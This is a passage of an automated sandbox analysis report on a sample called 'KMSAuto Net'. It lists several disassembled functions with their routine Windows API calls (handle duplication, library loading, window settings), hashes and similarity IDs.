                                                                    • Opcode Fuzzy Hash: 99933e4d16769d6f8c6c192903dd8bce702274893e4467ea59857398cdee7105
                                                                    • Instruction Fuzzy Hash: 7C31E2B5900209DFDB10CF9AD9846DEBBF6BF58324F54842AE815A7310D374A945CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01256C90 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3272 1256c90-1256d2c DuplicateHandle 3273 1256d35-1256d52 3272->3273 3274 1256d2e-1256d34 3272->3274 3274->3273
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01256D1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 19ea43860c0bb30fc3cf0d1e24bb4e89915255379a674e61e416c9871d7c1415
                                                                    • Instruction ID: fb46ceff81a2c40d3f8b93e697c5059ae0edb94dcd493eebaf562cc4a9fa5b70
                                                                    • Opcode Fuzzy Hash: 19ea43860c0bb30fc3cf0d1e24bb4e89915255379a674e61e416c9871d7c1415
                                                                    • Instruction Fuzzy Hash: A42114B69002099FDB10CFAAD984ADEBFF5FB48324F14841AE954A3310C378A944CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01256C98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3277 1256c98-1256d2c DuplicateHandle 3278 1256d35-1256d52 3277->3278 3279 1256d2e-1256d34 3277->3279 3279->3278
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01256D1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 9f319ca73d1f75334fba789b0ee17d6169edc5dff3b838864ad28d285f5269cb
                                                                    • Instruction ID: 87c16d9c88778dc4806904e48a5c3bef75c57bebcd788f472647f9a7f128d766
                                                                    • Opcode Fuzzy Hash: 9f319ca73d1f75334fba789b0ee17d6169edc5dff3b838864ad28d285f5269cb
                                                                    • Instruction Fuzzy Hash: C521F3B59002099FDB10CFAAD984ADEBFF9FB48324F14841AE914A3310D378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125BF08 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3282 125bf08-125bf50 3284 125bf52-125bf55 3282->3284 3285 125bf58-125bf60 3282->3285 3284->3285 3286 125bf63-125bf87 LoadLibraryExW 3285->3286 3287 125bf90-125bfad 3286->3287 3288 125bf89-125bf8f 3286->3288 3288->3287
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: a43e1dd02dfdceafce87237b5b1de231a91fd86fc2f1edcf3b3a5bbd29966a3c
                                                                    • Instruction ID: 67ed032cb3c21903f6449c0016363ccc889e2934c0c745e55d04eb1862efdadb
                                                                    • Opcode Fuzzy Hash: a43e1dd02dfdceafce87237b5b1de231a91fd86fc2f1edcf3b3a5bbd29966a3c
                                                                    • Instruction Fuzzy Hash: D72147B6C003098FDB10CFAAC884ADEFBF5EB48314F14856EE419A7600C375A545CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125AFB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3291 125afb8-125bf50 3293 125bf52-125bf55 3291->3293 3294 125bf58-125bf87 LoadLibraryExW 3291->3294 3293->3294 3296 125bf90-125bfad 3294->3296 3297 125bf89-125bf8f 3294->3297 3297->3296
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: d34deb334edb65ed7b78de524f564255cd5d403f996ba7309a1c37aad7607b83
                                                                    • Instruction ID: ab798e413e7fa429ba1f1e7c0d829ef0b84177a8fe1337a4a88c90c46d2c8390
                                                                    • Opcode Fuzzy Hash: d34deb334edb65ed7b78de524f564255cd5d403f996ba7309a1c37aad7607b83
                                                                    • Instruction Fuzzy Hash: 9B1117B69002098FDB10CF9AD884BDEFBF5EB48314F14842EE919A7200C375A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125BC88 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3300 125bc88-125bcc8 3301 125bcd0-125bcfb GetModuleHandleW 3300->3301 3302 125bcca-125bccd 3300->3302 3303 125bd04-125bd18 3301->3303 3304 125bcfd-125bd03 3301->3304 3302->3301 3304->3303
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0125BCEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: cf648f1c399720d1a0197f264bf6068225a0aa19510bf1d18023cce78b449725
                                                                    • Instruction ID: f341dcede12540cf16958c40f54a6e0a6e121dae5c99bb99dd8af8ca39361312
                                                                    • Opcode Fuzzy Hash: cf648f1c399720d1a0197f264bf6068225a0aa19510bf1d18023cce78b449725
                                                                    • Instruction Fuzzy Hash: 981113B6C002498FDB10CF9AC884ADEFBF5AB48324F14855AD819A7200C379A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125DDA0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3310 125dda0-125de0a SetWindowLongW 3311 125de13-125de27 3310->3311 3312 125de0c-125de12 3310->3312 3312->3311
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0125DDFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: f95f9e00c4eeb3eaa4e589da8922819885da2c625bd0455fb1079a9ce5e1aa56
                                                                    • Instruction ID: dee3a90b70b11f8723c9013059f5282dd66b73db8875567661612c021df5c5e2
                                                                    • Opcode Fuzzy Hash: f95f9e00c4eeb3eaa4e589da8922819885da2c625bd0455fb1079a9ce5e1aa56
                                                                    • Instruction Fuzzy Hash: 971115B59002498FDB20CF9AD984BDEFBF8EB48324F20855AD914A7300C374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125DD99 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3306 125dd99-125de0a SetWindowLongW 3307 125de13-125de27 3306->3307 3308 125de0c-125de12 3306->3308 3308->3307
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0125DDFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: eaa1977621de9ebc28024b7c73bd21cc6a70891a920bdc2bb842311d244e33d8
                                                                    • Instruction ID: 446f08341a29b25a3c89619204aa2f746f5db24368e8fb2cb9e0951a63b3dc69
                                                                    • Opcode Fuzzy Hash: eaa1977621de9ebc28024b7c73bd21cc6a70891a920bdc2bb842311d244e33d8
                                                                    • Instruction Fuzzy Hash: 1F1106B59002098FDB10DF99D985BDEBBF4EB48324F14855AD914B7300C378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125BFB0 Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: ff8d7a9edfbfd749208382cf2a4a8fca8cf1e7eb07898dd11245126b8b2cdfc4
                                                                    • Instruction ID: 15ac2d3de1b3d738dbbf9b93b40c268ddcd8dea1170c7424370a7d4d56e3dde4
                                                                    • Opcode Fuzzy Hash: ff8d7a9edfbfd749208382cf2a4a8fca8cf1e7eb07898dd11245126b8b2cdfc4
                                                                    • Instruction Fuzzy Hash: 1C01FD768043018FEB208BADD8443DABBF5AF94324F10801EE514E7651C37A9444CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0104D1D4 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a90e2d75b7f6a9c87f0360fe8bec41a54390f32499d0736dc08def5fd1b30036
                                                                    • Instruction ID: 47223e9feab00de45fc18b5d816c890c8d115c91cd5b8a29f963d94b60aae0f2
                                                                    • Opcode Fuzzy Hash: a90e2d75b7f6a9c87f0360fe8bec41a54390f32499d0736dc08def5fd1b30036
                                                                    • Instruction Fuzzy Hash: 08214CB5604240EFDB01DF58DAC0B16BBA5FBA4324F24C6BDE8894B342C336D846CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0104D01C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84d68082fe0cf1274bcb9aa7cf2e3d118c151b9c22430d108c525abe821850aa
                                                                    • Instruction ID: 94c855afd297b9804a2c9350dba45dcf67f9b4483d67fa4311c6d008c63c25a7
                                                                    • Opcode Fuzzy Hash: 84d68082fe0cf1274bcb9aa7cf2e3d118c151b9c22430d108c525abe821850aa
                                                                    • Instruction Fuzzy Hash: F42125B5604240DFDB15CF58D9C0B16BBA5FB94354F24C9BDE8894B246C33BD846CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0104D006 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24fc3e953e98f549b7ed58a82471c6a6124121723560fb9cfddaa372b2479c67
                                                                    • Instruction ID: 909c8f01a74608fc37a432b463dfc7e5262283de2c29a985ce6aa03179898fbb
                                                                    • Opcode Fuzzy Hash: 24fc3e953e98f549b7ed58a82471c6a6124121723560fb9cfddaa372b2479c67
                                                                    • Instruction Fuzzy Hash: 44217FB55083809FCB02CF54D994B11BFB1EB46214F28C5EAD8858B297C33A9846CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0104D1CF Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                    • Instruction ID: 1a23760682c1d6b6b9a2559fd204774fa8e18f51a1b3f306330024fa9b598b71
                                                                    • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                    • Instruction Fuzzy Hash: 3A11BEB5504280DFDB42CF54C6C4B15BBA1FB94224F28C6ADD8894B656C33AD44ACB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%